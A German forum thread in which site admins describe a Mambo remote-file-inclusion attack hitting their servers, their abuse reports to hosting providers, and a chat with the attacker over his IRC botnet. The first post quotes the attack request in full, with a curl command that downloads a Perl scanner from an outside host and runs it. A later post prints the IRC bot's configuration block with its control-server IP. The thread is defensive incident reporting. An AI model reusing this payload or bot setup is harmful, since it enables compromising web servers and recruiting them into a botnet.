Besuch von Sclipici / Sclico ?

[Guin]

In letzter Zeit haeuft sich folgender Request:

/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://www.rebegea.as.ro/scan.pl;perl%20/tmp/unix

(scheinbar eine Mambo Schwachstelle)

.:[ OwNeD by Xargonn ]:.
Der Kerl hat auch einen IRC Server auf 85.214.24.222:6667
Dort tragen brav alle "gehackten" Server als Bot ein und dienen als Scanner.

Ich bin nun schon seit ein paar Tagen dabei, die Besitzer dieser Server zu benachrichtigen. Einige melden sich und beheben das Problem.. andere wiederrum scheints nicht zu kuemmern. Dann geht eine Mail an das Hostunternehmen, welche den Server dann ggf abschalten.

Vor ein paar Tagen konnte ich immerhin erreichen, dass der "Hacker" seinen IRC Server auf einen anderen Server verlegen musste. Aber bei der Masse schaffe ich es nicht, ihm alle Server wegzunehmen.

Vielleicht konnte man das hier zum Spiel machen. Wenn ihr alle helft, muesste es doch moeglich sein, dem Hacker das Leben um einiges schwerer zu machen.
Wer uebrigens mit dem Hacker mal chatten will, kann abends in den IRC gehen. Gebrochenes Englisch kann er schreiben.

Fuer Ratschlaege und Hinweise wie man es besser/anders machen koennte, bin ich offen.

[edit]
es sind wenigstens 2:
der eine nennt sich rebegea
und der andere Sclipici, Sclico oder Gabi

 

[V40]

Hallo Guin,

grundlegend finde ich die Idee sehr gut.
Andererseits sehe ich tagtäglich in meinen Logs soviele Versuche Joomla-Schwachstellen zu finden das das eine neue Lebensaufgabe wäre

 

[Guin]

So.. 100000 abuse-Mails spaeter. Einige haben sich sogar bedankt.
Diese Woche gabs bisher keinen einzigen Besuch von dem netten Einbrecher bei mir zu verzeichnen.

Andererseits sehe ich tagtäglich in meinen Logs soviele Versuche Joomla-Schwachstellen zu finden...

Bei mir war nur sehr auffaellig, dass alle von ein und der selben Person kamen.

 

[V40]

Hallo Guin,

hast du denn auch schon Strato angeschrieben?
Das wäre ja mein erster Schritt gewesen.

 

[Guin]

Klar habe ich das gemacht. (den IRC Server auf 85.214.24.222 gib's auch nicht mehr)
Strato, Schlund, Server4You,... wurden von mir beglueckt
Sogar bei einem rumaenischen Hoster (evonet.ro) habe ich es versucht.. aber keine Antwort erhalten.

Teilweise habe ich auch versucht die Beitzer direkt anzuschreiben, welche sich dann auch teilweise gemeldet haben.

 

[V40]

Saubere Arbeit!

 

[Guin]

So. gibt wieder Neues.
Nachdem der IRC Server nun einige Male gewechselt hat, ist der IRC nun im Ausland gelandet.
Den Admin scheint's nicht sonderlich zu kratzen..

Leider sind die Channels im IRC nun unsichtbar gemacht worden. Ich kann nun leider nicht mehr sehen, welche Server alle fuer "Necazul" am scannen sind.
Weiss vielleicht jemand, wie man da eine Luecke finden kann?

Welcome to the Internet Relay Network necazul
Your host is Ce.gatu.mati.cauti.aici, running version beware1.5.7
This server was created Tue Jul 13 2004 at 20:36:17 GMT
Ce.gatu.mati.cauti.aici beware1.5.7 dgikoswx biklmnoprstv
MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=100 MAXBANS=45 are supported by this server
NICKLEN=15 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 are supported by this server

Diemal habe ich daran gedacht, den IRC Dialog zu kopieren

<necazul> sal
<necazul> hi
<necazul> problem
<necazul> ?
<necazul> Hu ar you ?
<test> i don't think so
<necazul> lol gud
<necazul> Hu ar you ?
<test> i'm the guy how visited you a week ago
<test> you remember?
<necazul> mambo
<necazul> & G..
<test> right
<necazul> wow
<necazul> hehe yu fond mai scripot again
<necazul>
<necazul> script*
<test> why do you hide the channels?
<test> now it's hard for me to bann your hacked server
<necazul> =)))))
<necazul> lol man
<test> that's not fair
<necazul> man y let u las time giv de neame yor server & i pas over hem .. i lake u 7 i dont woand problem
<test> just give me the hacked server list, and all is ok for me.
<necazul> LOOOOOL
<necazul> "hacked server list"
<necazul> lol man
<necazul> i scan for them ..
<necazul> i dont nou eni list
<necazul> )
<test> okay. change "hacked" by "scanning" ... it's for me all the same
<necazul> Pai ai hack all www.google.com
<necazul> )))))
<necazul> this iz the list
<necazul> )
<test> *g* i don't think so
<test> doesn't matter
Closing Link: test[~DOP@dslb-082-083-092-155.pools.arcor-ip.net] by necazul (Killed (necazul (Bye man)))

 

[V40]

Hallo Guin,

verate doch mal die neue IP des IRC Servers

 

[Guin]

Ja, warum eigentlich auch nicht.

12.151.18.245

Have fun

 

[V40]

Hallo,

da sind aber ein paar....

There are 17 users and 4 invisible on 1 servers
3 operator(s) online
5 channels formed
I have 21 clients and 0 servers

 

[Guin]

Ja da sind ein paar. Aber eben leider fuer "normal previligierte" nicht sichtbar.
Zumindest kann ich keinen Channel sehen und nicht joinen.

Nachtrag: Ok momentan ist ein Channel sichtbar. Das ist aber eben nur einer von 5

 

[V40]

Was mich irritiert ist das in dem Script (das böse Script das geladen wird durch die Schwachstelle) immer noch die IP vom alten IRC Server steht.

Und in dem Script ist vorgegeben in welchen Channel gejoint werden soll.
Allerdings kann ich auch in den nicht joinen.

Ich vermute mal das man den richtigen Nicknamen mitbringen muss dafür.
Also die ID.

 

[Guin]

Ich vermute mal das man den richtigen Nicknamen mitbringen muss dafür.

Vermute ich auch. Ich habe auch schon ein wenig rumexperimentiert, allerdings ohne Erfolg. Und wirklich Lust das Skript durchzugehen, habe ich nicht.

my $processo = '-bash';
#----------------------------------------------##
my $linas_max='10';                            # 
#----------------------------------------------#
my $sleep='3';                                 #
my @adms=("necazul");	       #
#----------------------------------------------################################################
my @canais=("#newpublis :lametrapchan","#newpublis :lametrapchan");     #
#----------------------------------------------################################################

my $nick='new';	                       # 
#----------------------------------------------################################################
my $ircname = 'id';                         #
#----------------------------------------------################################################
chop (my $realname = `uname -a`);                   #
#----------------------------------------------################################################
$servidor='12.151.18.245' 		       #
unless $servidor;  			       #
#----------------------------------------------################################################
my $porta='6667';	                       #

Die Nicks sehen momentan so aus: new1234